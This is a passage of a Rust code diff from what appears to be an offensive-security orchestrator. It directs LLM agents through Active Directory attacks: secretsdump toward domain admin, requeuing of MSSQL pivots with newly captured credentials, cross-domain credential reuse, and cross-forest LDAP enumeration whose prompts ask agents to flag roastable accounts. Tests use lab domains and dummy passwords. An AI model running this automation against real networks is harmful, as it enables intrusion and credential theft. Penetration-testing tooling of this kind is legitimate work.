@@ -8,8 +8,9 @@ use std::sync::Arc; use std::time::Duration; +use redis::AsyncCommands; use tokio::sync::watch; -use tracing::debug; +use tracing::{debug, info}; use crate::orchestrator::dispatcher::Dispatcher; use crate::orchestrator::state::*; @@ -319,7 +320,11 @@ pub async fn auto_credential_expansion( // This is the fastest path from hash → krbtgt → DA. { let state = dispatcher.state.read().await; - let dc_ips: Vec = state.domain_controllers.values().cloned().collect(); + let dc_ips: Vec = state + .all_domains_with_dcs() + .into_iter() + .map(|(_, ip)| ip) + .collect(); drop(state); if !dispatcher.is_technique_allowed("secretsdump") { @@ -378,7 +383,120 @@ pub async fn auto_credential_expansion( .await; } } + + // 5. Re-dispatch unsuccessful mssql_access vulns when a new same-domain + // cleartext credential is available. Cross-forest MSSQL pivots fail + // if the LLM tries them before any usable cred exists in the linked + // server's source forest — once that cred arrives, push the vuln + // back into the exploitation ZSET so the LLM gets another shot + // with the new credential set in its prompt context. 
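+        // The retry dedup key is "{vuln_id}:{user}:{domain}" (lowercased),
+        // e.g. "vuln-mssql-01:svc_sql:contoso.local" for a hypothetical vuln
+        // id, so each (vuln, credential) pair is requeued at most once.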
+        let retries = collect_mssql_retries(&dispatcher).await;
+        for retry in retries {
+            if let Err(e) = requeue_mssql_vuln(&dispatcher, &retry).await {
+                debug!(err = %e, vuln_id = %retry.vuln_id, "Failed to requeue mssql_access");
+                continue;
+            }
+            info!(
+                vuln_id = %retry.vuln_id,
+                cred_user = %retry.cred_user,
+                cred_domain = %retry.cred_domain,
+                "Re-queued mssql_access for new credential"
+            );
+            dispatcher
+                .state
+                .write()
+                .await
+                .mark_processed(DEDUP_MSSQL_RETRY, retry.dedup_key.clone());
+            let _ = dispatcher
+                .state
+                .persist_dedup(&dispatcher.queue, DEDUP_MSSQL_RETRY, &retry.dedup_key)
+                .await;
+        }
+    }
+}
+
+struct MssqlRetry {
+    vuln_id: String,
+    vuln_json: String,
+    priority: i32,
+    cred_user: String,
+    cred_domain: String,
+    dedup_key: String,
+}
+
+/// Walk discovered vulnerabilities for `mssql_access` entries that are not
+/// yet exploited and have at least one matching unseen credential. Builds
+/// a (vuln, credential) work item with a stable dedup key so the same
+/// vuln/cred pair is not re-queued repeatedly.
+async fn collect_mssql_retries(dispatcher: &Arc<Dispatcher>) -> Vec<MssqlRetry> {
+    let state = dispatcher.state.read().await;
+    let mut out = Vec::new();
+    for vuln in state.discovered_vulnerabilities.values() {
+        if vuln.vuln_type != "mssql_access" {
+            continue;
+        }
+        if state.exploited_vulnerabilities.contains(&vuln.vuln_id) {
+            continue;
+        }
+        let vuln_domain = vuln
+            .details
+            .get("domain")
+            .and_then(|v| v.as_str())
+            .unwrap_or("")
+            .to_lowercase();
+        for cred in &state.credentials {
+            if cred.password.is_empty() || cred.domain.is_empty() {
+                continue;
+            }
+            // Match on domain when the vuln carries one. Otherwise match any
+            // cred — the LLM will pick from the prompt's credential list.
+            let cred_dom = cred.domain.to_lowercase();
+            let matches_domain = vuln_domain.is_empty()
+                || cred_dom == vuln_domain
+                || cred_dom.ends_with(&format!(".{vuln_domain}"))
+                || vuln_domain.ends_with(&format!(".{cred_dom}"));
+            if !matches_domain {
+                continue;
+            }
+            let dedup_key = format!(
+                "{}:{}:{}",
+                vuln.vuln_id,
+                cred.username.to_lowercase(),
+                cred_dom
+            );
+            if state.is_processed(DEDUP_MSSQL_RETRY, &dedup_key) {
+                continue;
+            }
+            let Ok(vuln_json) = serde_json::to_string(vuln) else {
+                continue;
+            };
+            out.push(MssqlRetry {
+                vuln_id: vuln.vuln_id.clone(),
+                vuln_json,
+                priority: vuln.priority,
+                cred_user: cred.username.clone(),
+                cred_domain: cred.domain.clone(),
+                dedup_key,
+            });
+        }
+    }
+    out
+}
+
+/// Push the vuln back into the exploitation ZSET. The exploitation_workflow
+/// loop pops by lowest score; reuse the original priority so the retry
+/// competes fairly with other work.
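+/// The 24h expiry refresh on the ZSET is best-effort: a failed EXPIRE is
+/// swallowed (`unwrap_or(())`) so a requeue never fails just because the
+/// TTL bump did.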
+async fn requeue_mssql_vuln( + dispatcher: &Arc, + retry: &MssqlRetry, +) -> anyhow::Result<()> { + let key = dispatcher.state.vuln_queue_key().await; + let mut conn = dispatcher.queue.connection(); + let _: () = conn + .zadd(&key, &retry.vuln_json, retry.priority as f64) + .await?; + let _: () = conn.expire(&key, 86400).await.unwrap_or(()); + Ok(()) } struct ExpansionWork { @@ -423,12 +541,12 @@ mod tests { #[test] fn netbios_domain_resolution() { // Simulate the NetBIOS→FQDN resolution logic from the automation loop - let raw = "NORTH"; + let raw = "CHILD"; let raw_lower = raw.to_lowercase(); // When netbios_to_fqdn has a mapping, use it let mut map = std::collections::HashMap::new(); - map.insert("north".to_string(), "north.contoso.local".to_string()); + map.insert("child".to_string(), "child.contoso.local".to_string()); let resolved = if !raw_lower.contains('.') { map.get(&raw_lower) @@ -437,7 +555,7 @@ mod tests { } else { raw_lower.clone() }; - assert_eq!(resolved, "north.contoso.local"); + assert_eq!(resolved, "child.contoso.local"); // When FQDN is already used, pass through let fqdn_raw = "contoso.local"; @@ -452,7 +570,7 @@ mod tests { assert_eq!(resolved2, "contoso.local"); // When no mapping exists, use the raw value - let unknown = "CHILD"; + let unknown = "UNKNOWN"; let unknown_lower = unknown.to_lowercase(); let resolved3 = if !unknown_lower.contains('.') { map.get(&unknown_lower) @@ -461,7 +579,7 @@ mod tests { } else { unknown_lower.clone() }; - assert_eq!(resolved3, "child"); + assert_eq!(resolved3, "unknown"); } #[test] diff --git a/ares-cli/src/orchestrator/automation/credential_reuse.rs b/ares-cli/src/orchestrator/automation/credential_reuse.rs index ebacf8dd..3573ab06 100644 --- a/ares-cli/src/orchestrator/automation/credential_reuse.rs +++ b/ares-cli/src/orchestrator/automation/credential_reuse.rs @@ -19,6 +19,13 @@ use crate::orchestrator::dispatcher::Dispatcher; const DEDUP_CROSS_REUSE: &str = "cross_reuse"; /// Check if a username is a high-value reuse candidate. +/// +/// Machine accounts (`HOST$`) are NEVER reuse candidates — their NT hash is +/// derived from the computer's randomly-generated 240-byte password and is +/// bound to that computer object in its source NTDS. The hash will not +/// authenticate as another machine, in another domain, or in any trusted +/// forest. Dispatching `secretsdump` with a foreign machine hash always +/// returns STATUS_LOGON_FAILURE and just burns dispatcher budget. fn is_reuse_candidate(username: &str) -> bool { if username.ends_with('$') { return false; @@ -87,7 +94,7 @@ pub async fn auto_credential_reuse( let state = dispatcher.state.read().await; // Need at least 2 known DCs (implies multiple domains) - if state.domain_controllers.len() < 2 { + if state.all_domains_with_dcs().len() < 2 { continue; } @@ -105,7 +112,7 @@ pub async fn auto_credential_reuse( for hash in &reuse_candidates { let hash_domain = hash.domain.to_lowercase(); - for (dc_domain, dc_ip) in &state.domain_controllers { + for (dc_domain, dc_ip) in &state.all_domains_with_dcs() { let target_domain = dc_domain.to_lowercase(); // Skip same domain and parent/child domains (handled by secretsdump.rs) diff --git a/ares-cli/src/orchestrator/automation/cross_forest_enum.rs b/ares-cli/src/orchestrator/automation/cross_forest_enum.rs new file mode 100644 index 00000000..98d62dfc --- /dev/null +++ b/ares-cli/src/orchestrator/automation/cross_forest_enum.rs @@ -0,0 +1,881 @@ +//! auto_cross_forest_enum -- targeted cross-forest enumeration. +//! +//! 
When we have Admin Pwn3d on a DC in a foreign forest but haven't enumerated
+//! that forest's users/groups, this module dispatches targeted LDAP enumeration
+//! using the best available credential path.
+//!
+//! Unlike `auto_domain_user_enum` (which fires once per domain), this module
+//! retries with better credentials as they become available — specifically:
+//! - Cracked passwords from cross-forest secretsdump hashes
+//! - Credentials obtained via MSSQL linked server pivots
+//! - Admin credentials from owned DCs in the foreign forest
+//!
+//! This covers the gap where the trusted forest's users are not enumerated
+//! because initial recon only has primary-forest credentials.
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Check if a credential belongs to a different forest than the target domain.
+fn is_cross_forest(cred_domain: &str, target_domain: &str) -> bool {
+    let c = cred_domain.to_lowercase();
+    let t = target_domain.to_lowercase();
+    // Same domain or parent/child = same forest
+    !(c == t || c.ends_with(&format!(".{t}")) || t.ends_with(&format!(".{c}")))
+}
+
+/// Build dedup key incorporating the credential to allow retry with better creds.
+fn cross_forest_dedup_key(domain: &str, username: &str, cred_domain: &str) -> String {
+    format!(
+        "xforest:{}:{}@{}",
+        domain.to_lowercase(),
+        username.to_lowercase(),
+        cred_domain.to_lowercase()
+    )
+}
+
+fn bind_domain_for_cross_forest(cred_domain: &str, target_domain: &str) -> Option<String> {
+    if cred_domain.trim().is_empty() || cred_domain.eq_ignore_ascii_case(target_domain) {
+        None
+    } else {
+        Some(cred_domain.to_string())
+    }
+}
+
+/// Collect cross-forest enumeration work items from the current state.
+///
+/// Returns an empty vec when there are fewer than 2 domains, no credentials,
+/// or no actionable work to dispatch.
+fn collect_cross_forest_work(state: &StateInner) -> Vec<CrossForestWork> {
+    if state.credentials.is_empty() || state.domains.len() < 2 {
+        return Vec::new();
+    }
+
+    let mut items = Vec::new();
+
+    for (domain, dc_ip) in &state.all_domains_with_dcs() {
+        let domain_lower = domain.to_lowercase();
+
+        // Count how many users we know in this domain.
+        let known_user_count = state
+            .credentials
+            .iter()
+            .filter(|c| c.domain.to_lowercase() == domain_lower)
+            .count();
+
+        // Also count hashes for this domain.
+        let known_hash_count = state
+            .hashes
+            .iter()
+            .filter(|h| h.domain.to_lowercase() == domain_lower)
+            .count();
+
+        // Skip domains where we already have good coverage
+        // (at least 5 credentials or 10 hashes = likely already enumerated).
+        if known_user_count >= 5 || known_hash_count >= 10 {
+            continue;
+        }
+
+        // Find the best credential for this domain.
+        // Priority: same-domain cred > admin cred > cracked hash > any cred.
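+        // Rank used by the min_by_key below (lower is better):
+        //   0 = same-domain cred, 1 = admin from elsewhere,
+        //   2 = same forest, 3 = cross-forest via trust.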
+ let best_cred = state + .credentials + .iter() + .filter(|c| { + !c.password.is_empty() && !state.is_credential_quarantined(&c.username, &c.domain) + }) + .min_by_key(|c| { + let c_dom = c.domain.to_lowercase(); + if c_dom == domain_lower { + 0 // Same domain = best + } else if c.is_admin { + 1 // Admin from another domain = good (trust auth) + } else if !is_cross_forest(&c_dom, &domain_lower) { + 2 // Same forest = acceptable + } else { + 3 // Cross-forest = may work via trust + } + }) + .cloned(); + + let cred = match best_cred { + Some(c) => c, + None => continue, + }; + + let dedup_key = cross_forest_dedup_key(&domain_lower, &cred.username, &cred.domain); + if state.is_processed(DEDUP_CROSS_FOREST_ENUM, &dedup_key) { + continue; + } + + items.push(CrossForestWork { + dedup_key, + domain: domain.clone(), + dc_ip: dc_ip.clone(), + credential: cred, + is_under_enumerated: known_user_count < 3, + }); + } + + items +} + +/// Dispatches targeted user + group enumeration for foreign forests. +/// Interval: 45s. +pub async fn auto_cross_forest_enum( + dispatcher: Arc, + mut shutdown: watch::Receiver, +) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + // Wait for initial credential discovery and cross-domain pivots. + tokio::time::sleep(Duration::from_secs(120)).await; + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("cross_forest_enum") { + continue; + } + + let work: Vec = { + let state = dispatcher.state.read().await; + collect_cross_forest_work(&state) + }; + if work.is_empty() { + continue; + } + + for item in work { + // Dispatch user enumeration + let mut user_payload = json!({ + "technique": "ldap_user_enumeration", + "target_ip": item.dc_ip, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + "filters": ["(objectCategory=person)(objectClass=user)"], + "attributes": [ + "sAMAccountName", "description", "memberOf", + "userAccountControl", "servicePrincipalName", + "msDS-AllowedToDelegateTo", "adminCount" + ], + "cross_forest": true, + "instructions": concat!( + "This is a cross-forest enumeration task. Enumerate ALL users in the ", + "target domain via LDAP. If the credential is from a different domain, ", + "authenticate via the forest trust. Report every user found with their ", + "group memberships, SPNs, delegation settings, and description fields. ", + "Pay special attention to accounts with adminCount=1, ", + "DoesNotRequirePreAuth, or interesting SPNs.\n\n", + "IMPORTANT: For each user found, include them in the discovered_users ", + "array with EXACTLY this JSON format:\n", + " {\"username\": \"samaccountname\", \"domain\": \"domain.local\", ", + "\"source\": \"ldap_enumeration\", \"memberOf\": [\"Group1\", \"Group2\"]}\n", + "Also report users with DoesNotRequirePreAuth as vulnerabilities with ", + "vuln_type='asrep_roastable', and users with SPNs as vuln_type='kerberoastable'." 
+ ), + }); + if let Some(bind_domain) = + bind_domain_for_cross_forest(&item.credential.domain, &item.domain) + { + user_payload["bind_domain"] = json!(bind_domain); + } + + let priority = dispatcher.effective_priority("cross_forest_enum"); + match dispatcher + .throttled_submit("recon", "recon", user_payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + domain = %item.domain, + dc = %item.dc_ip, + cred_user = %item.credential.username, + cred_domain = %item.credential.domain, + under_enumerated = item.is_under_enumerated, + "Cross-forest user enumeration dispatched" + ); + } + Ok(None) => { + debug!(domain = %item.domain, "Cross-forest user enum deferred"); + continue; // Don't mark as processed if deferred + } + Err(e) => { + warn!(err = %e, domain = %item.domain, "Failed to dispatch cross-forest user enum"); + continue; + } + } + + // Also dispatch group enumeration for the same domain + let mut group_payload = json!({ + "technique": "ldap_group_enumeration", + "target_ip": item.dc_ip, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + "filters": ["(objectCategory=group)"], + "attributes": [ + "sAMAccountName", "member", "memberOf", "managedBy", + "groupType", "objectSid", "description" + ], + "enumerate_members": true, + "resolve_foreign_principals": true, + "cross_forest": true, + "instructions": concat!( + "Enumerate ALL security groups in this domain and their members. ", + "Resolve Foreign Security Principals to their source domain. ", + "Report group name, type (Global/DomainLocal/Universal), members, ", + "and managed-by. This is critical for mapping cross-domain attack paths.\n\n", + "IMPORTANT: For each user found in any group, include them in the ", + "discovered_users array with EXACTLY this JSON format:\n", + " {\"username\": \"samaccountname\", \"domain\": \"domain.local\", ", + "\"source\": \"ldap_group_enumeration\", \"memberOf\": [\"Group1\", \"Group2\"]}" + ), + }); + if let Some(bind_domain) = + bind_domain_for_cross_forest(&item.credential.domain, &item.domain) + { + group_payload["bind_domain"] = json!(bind_domain); + } + + let group_priority = dispatcher.effective_priority("group_enumeration"); + if let Ok(Some(task_id)) = dispatcher + .throttled_submit("recon", "recon", group_payload, group_priority) + .await + { + info!( + task_id = %task_id, + domain = %item.domain, + "Cross-forest group enumeration dispatched" + ); + } + + // Mark as processed + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_CROSS_FOREST_ENUM, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_CROSS_FOREST_ENUM, &item.dedup_key) + .await; + } + } +} + +struct CrossForestWork { + dedup_key: String, + domain: String, + dc_ip: String, + credential: ares_core::models::Credential, + is_under_enumerated: bool, +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn is_cross_forest_same_domain() { + assert!(!is_cross_forest("contoso.local", "contoso.local")); + } + + #[test] + fn is_cross_forest_child_domain() { + assert!(!is_cross_forest("child.contoso.local", "contoso.local")); + } + + #[test] + fn is_cross_forest_parent_domain() { + assert!(!is_cross_forest("contoso.local", "child.contoso.local")); + } + + #[test] + fn is_cross_forest_different_forests() { + assert!(is_cross_forest("contoso.local", "fabrikam.local")); + } + + #[test] + fn is_cross_forest_case_insensitive() { + 
assert!(!is_cross_forest("CONTOSO.LOCAL", "contoso.local")); + assert!(is_cross_forest("CONTOSO.LOCAL", "fabrikam.local")); + } + + #[test] + fn dedup_key_format() { + let key = cross_forest_dedup_key("fabrikam.local", "Admin", "CONTOSO.LOCAL"); + assert_eq!(key, "xforest:fabrikam.local:admin@contoso.local"); + } + + #[test] + fn dedup_key_case_insensitive() { + let k1 = cross_forest_dedup_key("FABRIKAM.LOCAL", "Admin", "contoso.local"); + let k2 = cross_forest_dedup_key("fabrikam.local", "admin", "CONTOSO.LOCAL"); + assert_eq!(k1, k2); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_CROSS_FOREST_ENUM, "cross_forest_enum"); + } + + #[test] + fn bind_domain_added_for_foreign_forest() { + assert_eq!( + bind_domain_for_cross_forest("contoso.local", "fabrikam.local"), + Some("contoso.local".to_string()) + ); + } + + #[test] + fn bind_domain_omitted_for_same_domain() { + assert_eq!( + bind_domain_for_cross_forest("contoso.local", "contoso.local"), + None + ); + } + + #[test] + fn bind_domain_omitted_when_credential_domain_empty() { + assert_eq!(bind_domain_for_cross_forest("", "fabrikam.local"), None); + } + + #[test] + fn is_cross_forest_empty_strings() { + // Empty strings are equal (same empty domain) + assert!(!is_cross_forest("", "")); + } + + #[test] + fn is_cross_forest_one_empty() { + assert!(is_cross_forest("contoso.local", "")); + assert!(is_cross_forest("", "contoso.local")); + } + + #[test] + fn is_cross_forest_deeply_nested() { + assert!(!is_cross_forest("a.b.contoso.local", "contoso.local")); + assert!(!is_cross_forest("contoso.local", "a.b.contoso.local")); + } + + #[test] + fn cross_forest_work_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: true, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = CrossForestWork { + dedup_key: "xforest:fabrikam.local:admin@contoso.local".into(), + domain: "fabrikam.local".into(), + dc_ip: "192.168.58.20".into(), + credential: cred, + is_under_enumerated: true, + }; + assert!(work.is_under_enumerated); + assert_eq!(work.domain, "fabrikam.local"); + } + + #[test] + fn user_enum_payload_structure() { + let payload = serde_json::json!({ + "technique": "ldap_user_enumeration", + "target_ip": "192.168.58.20", + "domain": "fabrikam.local", + "credential": { + "username": "admin", + "password": "P@ssw0rd!", + "domain": "contoso.local", + }, + "cross_forest": true, + }); + assert_eq!(payload["technique"], "ldap_user_enumeration"); + assert!(payload["cross_forest"].as_bool().unwrap()); + assert_eq!(payload["domain"], "fabrikam.local"); + } + + #[test] + fn group_enum_payload_structure() { + let payload = serde_json::json!({ + "technique": "ldap_group_enumeration", + "target_ip": "192.168.58.20", + "domain": "fabrikam.local", + "resolve_foreign_principals": true, + "cross_forest": true, + }); + assert_eq!(payload["technique"], "ldap_group_enumeration"); + assert!(payload["resolve_foreign_principals"].as_bool().unwrap()); + } + + #[test] + fn coverage_threshold_values() { + // Module uses: known_user_count >= 5 || known_hash_count >= 10 + let known_user_count = 4; + let known_hash_count = 9; + assert!(known_user_count < 5 && known_hash_count < 10); // should trigger enum + + let known_user_count2 = 5; + assert!(known_user_count2 >= 5); // should skip + + let known_hash_count2 = 10; + assert!(known_hash_count2 >= 10); // should 
skip + } + + #[test] + fn under_enumerated_threshold() { + // is_under_enumerated = known_user_count < 3 + let counts = [0_usize, 2, 3, 5]; + assert!(counts[0] < 3); // 0 users = under-enumerated + assert!(counts[1] < 3); // 2 users = under-enumerated + assert!(counts[2] >= 3); // 3 users = not under-enumerated + } + + // --- collect_cross_forest_work tests --- + + fn make_cred( + id: &str, + user: &str, + pass: &str, + domain: &str, + admin: bool, + ) -> ares_core::models::Credential { + ares_core::models::Credential { + id: id.into(), + username: user.into(), + password: pass.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: admin, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + fn make_hash(user: &str, domain: &str) -> ares_core::models::Hash { + ares_core::models::Hash { + id: format!("h-{user}"), + username: user.into(), + hash_value: "aad3b435b51404eeaad3b435b51404ee:deadbeef".into(), + hash_type: "ntlm".into(), + domain: domain.into(), + cracked_password: None, + source: "test".into(), + discovered_at: None, + parent_id: None, + attack_step: 0, + aes_key: None, + } + } + + #[tokio::test] + async fn collect_empty_state_no_work() { + let state = SharedState::new("test".into()); + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_single_domain_no_work() { + let state = SharedState::new("test".into()); + { + let mut s = state.write().await; + s.domains.push("contoso.local".into()); + s.credentials.push(make_cred( + "c1", + "user1", + "P@ssw0rd!", + "contoso.local", + false, + )); // pragma: allowlist secret + s.domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + } + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + assert!(work.is_empty(), "single domain should produce no work"); + } + + #[tokio::test] + async fn collect_no_credentials_no_work() { + let state = SharedState::new("test".into()); + { + let mut s = state.write().await; + s.domains.push("contoso.local".into()); + s.domains.push("fabrikam.local".into()); + s.domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + } + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + assert!(work.is_empty(), "no credentials should produce no work"); + } + + #[tokio::test] + async fn collect_two_domains_with_cross_forest_cred() { + let state = SharedState::new("test".into()); + { + let mut s = state.write().await; + s.domains.push("contoso.local".into()); + s.domains.push("fabrikam.local".into()); + s.domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + s.credentials + .push(make_cred("c1", "admin", "P@ssw0rd!", "contoso.local", true)); + // pragma: allowlist secret + } + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + // Should produce work for both domains (the cred works for contoso as same-domain, + // and for fabrikam as cross-forest). 
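+        // Iteration order over all_domains_with_dcs is not guaranteed, so the
+        // assertions below check membership rather than position.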
+ assert!(!work.is_empty()); + // At least one item should target fabrikam + assert!(work.iter().any(|w| w.domain == "fabrikam.local")); + } + + #[tokio::test] + async fn collect_skips_domain_with_five_credentials() { + let state = SharedState::new("test".into()); + { + let mut s = state.write().await; + s.domains.push("contoso.local".into()); + s.domains.push("fabrikam.local".into()); + s.domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + // 5 credentials for fabrikam = already enumerated + for i in 0..5 { + s.credentials.push(make_cred( + &format!("c{i}"), + &format!("user{i}"), + "P@ssw0rd!", // pragma: allowlist secret + "fabrikam.local", + false, + )); + } + // Also need a cred that can authenticate + s.credentials + .push(make_cred("cx", "admin", "P@ssw0rd!", "contoso.local", true)); + // pragma: allowlist secret + } + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + // fabrikam should be skipped (>= 5 creds), contoso should appear + assert!( + work.iter().all(|w| w.domain != "fabrikam.local"), + "domain with >= 5 credentials should be skipped" + ); + } + + #[tokio::test] + async fn collect_skips_domain_with_ten_hashes() { + let state = SharedState::new("test".into()); + { + let mut s = state.write().await; + s.domains.push("contoso.local".into()); + s.domains.push("fabrikam.local".into()); + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + // 10 hashes for fabrikam + for i in 0..10 { + s.hashes + .push(make_hash(&format!("hashuser{i}"), "fabrikam.local")); + } + s.credentials + .push(make_cred("c1", "admin", "P@ssw0rd!", "contoso.local", true)); + // pragma: allowlist secret + } + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + assert!( + work.iter().all(|w| w.domain != "fabrikam.local"), + "domain with >= 10 hashes should be skipped" + ); + } + + #[tokio::test] + async fn collect_credential_priority_same_domain_best() { + let state = SharedState::new("test".into()); + { + let mut s = state.write().await; + s.domains.push("contoso.local".into()); + s.domains.push("fabrikam.local".into()); + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + // Cross-forest cred (priority 3) + s.credentials.push(make_cred( + "c1", + "crossuser", + "P@ssw0rd!", + "contoso.local", + false, + )); // pragma: allowlist secret + // Same-domain cred (priority 0) — should be selected + s.credentials.push(make_cred( + "c2", + "localuser", + "P@ssw0rd!", + "fabrikam.local", + false, + )); // pragma: allowlist secret + } + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + let fab_work = work.iter().find(|w| w.domain == "fabrikam.local"); + assert!(fab_work.is_some(), "should produce work for fabrikam"); + assert_eq!( + fab_work.unwrap().credential.username, + "localuser", + "same-domain credential should be preferred" + ); + } + + #[tokio::test] + async fn collect_credential_priority_admin_over_same_forest() { + let state = SharedState::new("test".into()); + { + let mut s = state.write().await; + s.domains.push("contoso.local".into()); + s.domains.push("fabrikam.local".into()); + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + // Same-forest non-admin (priority 2) + s.credentials.push(make_cred( + "c1", + "forestuser", + "P@ssw0rd!", + "child.fabrikam.local", + false, + )); // pragma: allowlist secret + 
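+            // child.fabrikam.local is same-forest for fabrikam.local via the
+            // suffix check in is_cross_forest, hence rank 2 rather than 3.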
// Admin from another domain (priority 1) — should win + s.credentials.push(make_cred( + "c2", + "adminuser", + "P@ssw0rd!", + "contoso.local", + true, + )); // pragma: allowlist secret + } + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + let fab_work = work.iter().find(|w| w.domain == "fabrikam.local"); + assert!(fab_work.is_some()); + assert_eq!( + fab_work.unwrap().credential.username, + "adminuser", + "admin credential should be preferred over same-forest non-admin" + ); + } + + #[tokio::test] + async fn collect_credential_priority_same_forest_over_cross_forest() { + let state = SharedState::new("test".into()); + { + let mut s = state.write().await; + s.domains.push("contoso.local".into()); + s.domains.push("fabrikam.local".into()); + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + // Cross-forest non-admin (priority 3) + s.credentials.push(make_cred( + "c1", + "crossuser", + "P@ssw0rd!", + "contoso.local", + false, + )); // pragma: allowlist secret + // Same-forest non-admin (priority 2) — should win + s.credentials.push(make_cred( + "c2", + "forestuser", + "P@ssw0rd!", + "child.fabrikam.local", + false, + )); // pragma: allowlist secret + } + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + let fab_work = work.iter().find(|w| w.domain == "fabrikam.local"); + assert!(fab_work.is_some()); + assert_eq!( + fab_work.unwrap().credential.username, + "forestuser", + "same-forest credential should be preferred over cross-forest" + ); + } + + #[tokio::test] + async fn collect_skips_quarantined_credentials() { + let state = SharedState::new("test".into()); + { + let mut s = state.write().await; + s.domains.push("contoso.local".into()); + s.domains.push("fabrikam.local".into()); + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + // Only credential is quarantined + s.credentials.push(make_cred( + "c1", + "baduser", + "P@ssw0rd!", + "contoso.local", + true, + )); // pragma: allowlist secret + s.quarantined_credentials.insert( + "baduser@contoso.local".into(), + chrono::Utc::now() + chrono::Duration::seconds(300), + ); + } + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + assert!( + work.iter().all(|w| w.credential.username != "baduser"), + "quarantined credentials should be skipped" + ); + } + + #[tokio::test] + async fn collect_skips_empty_password_credentials() { + let state = SharedState::new("test".into()); + { + let mut s = state.write().await; + s.domains.push("contoso.local".into()); + s.domains.push("fabrikam.local".into()); + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + // Only credential has empty password + s.credentials + .push(make_cred("c1", "nopass", "", "contoso.local", true)); + } + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + // No usable credential → should produce no work for fabrikam + assert!( + work.iter().all(|w| w.domain != "fabrikam.local"), + "empty password credentials should not produce work" + ); + } + + #[tokio::test] + async fn collect_skips_already_processed_dedup_key() { + let state = SharedState::new("test".into()); + { + let mut s = state.write().await; + s.domains.push("contoso.local".into()); + s.domains.push("fabrikam.local".into()); + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + s.credentials + .push(make_cred("c1", "admin", "P@ssw0rd!", "contoso.local", true)); // pragma: 
allowlist secret + // Pre-mark the dedup key as processed + let key = cross_forest_dedup_key("fabrikam.local", "admin", "contoso.local"); + s.mark_processed(DEDUP_CROSS_FOREST_ENUM, key); + } + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + assert!( + work.iter().all(|w| w.domain != "fabrikam.local"), + "already-processed dedup key should be skipped" + ); + } + + #[tokio::test] + async fn collect_under_enumerated_flag_when_few_users() { + let state = SharedState::new("test".into()); + { + let mut s = state.write().await; + s.domains.push("contoso.local".into()); + s.domains.push("fabrikam.local".into()); + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + // 2 fabrikam creds (< 3 = under-enumerated) + s.credentials.push(make_cred( + "c1", + "user1", + "P@ssw0rd!", + "fabrikam.local", + false, + )); // pragma: allowlist secret + s.credentials.push(make_cred( + "c2", + "user2", + "P@ssw0rd!", + "fabrikam.local", + false, + )); // pragma: allowlist secret + } + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + let fab_work = work.iter().find(|w| w.domain == "fabrikam.local"); + assert!(fab_work.is_some()); + assert!( + fab_work.unwrap().is_under_enumerated, + "domain with < 3 users should be marked under-enumerated" + ); + } + + #[tokio::test] + async fn collect_not_under_enumerated_with_three_users() { + let state = SharedState::new("test".into()); + { + let mut s = state.write().await; + s.domains.push("contoso.local".into()); + s.domains.push("fabrikam.local".into()); + s.domain_controllers + .insert("fabrikam.local".into(), "192.168.58.20".into()); + // 3 fabrikam creds (>= 3 = not under-enumerated, but < 5 so still triggers enum) + for i in 0..3 { + s.credentials.push(make_cred( + &format!("c{i}"), + &format!("user{i}"), + "P@ssw0rd!", // pragma: allowlist secret + "fabrikam.local", + false, + )); + } + } + let inner = state.read().await; + let work = collect_cross_forest_work(&inner); + let fab_work = work.iter().find(|w| w.domain == "fabrikam.local"); + assert!(fab_work.is_some()); + assert!( + 